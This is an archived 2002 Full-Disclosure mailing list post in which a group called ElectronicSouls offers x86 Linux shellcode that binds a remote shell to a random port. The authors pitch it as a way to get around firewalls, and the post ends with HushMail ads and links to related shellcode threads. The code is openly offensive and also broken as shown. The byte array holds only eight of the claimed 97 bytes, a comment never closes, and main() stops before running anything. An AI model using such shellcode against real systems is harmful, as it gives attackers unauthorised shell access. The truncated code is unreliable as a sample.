[Full-Disclosure] [ElectronicSouls] - Advanced Linux Shellcode

From: es@hush.com
Date: 11/29/02

From: es@hush.com (es@hush.com)
Date: Thu, 28 Nov 2002 22:45:38 -0800


Dear List,

We have pioneered a new shellcoding style for Linux. What our shellcode does is your typical "portbinding", but we take it to the next level as we have it bind to a random port. This is useful for traversing firewalls.

# cat random-portbind.c
/* (C) roc - [ElectronicSouls]
 * x86 Linux 97 bytes portbinding shellcode
 * This shellcode binds to a random port so if used
 * in remote/local(dont know why you'd want to use
 * it locally) you will have to nmap your target
 * to find what shell the port is on.

unsigned char shellcode[] = "\x31\xdb\x31\xc9\xf7\xe3\x52\x43"

int main() {
 /* modified from lamagra's execute chroot shellcode */
  int (*funct)();
  funct = (int (*)()) shellcode;
  printf("size = %d\n",strlen(shellcode));



The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"r(t) = (a cos(t))*i+(a sin(t))*j+btk"
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify


Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Big $$$ to be made with the HushMail Affiliate Program:

Relevant Pages

  • Re: multi-OS infections (Multi OS shellcode)
    ... The following asm was used to create the shellcode that follows it. ... linux: movl $0x1111113b, %eax ... bsd: movl $0x11111130, %eax ...
  • [Full-Disclosure] Proof of concept code to kill script kiddies out of the water!
    ... > Get r00t on any Linux x86 system ... I ported the shellcode to a windows batch file and it still failed... ...
  • Re: OS X Shell Code
    ... Here is some shellcode that I wrote a while back. ... also (same syscall number for execve) and fine on Linux with a changed ... On Thu, 10 Jan 2002, Josha Bronson wrote: ...
  • Re: buffer overflow question
    ... > I have a question regarding buffer overflow exploits. ... > Assuming we want to exploit a simple program on linux, ... > copying when it reaches the NULL byte inside the shellcode? ...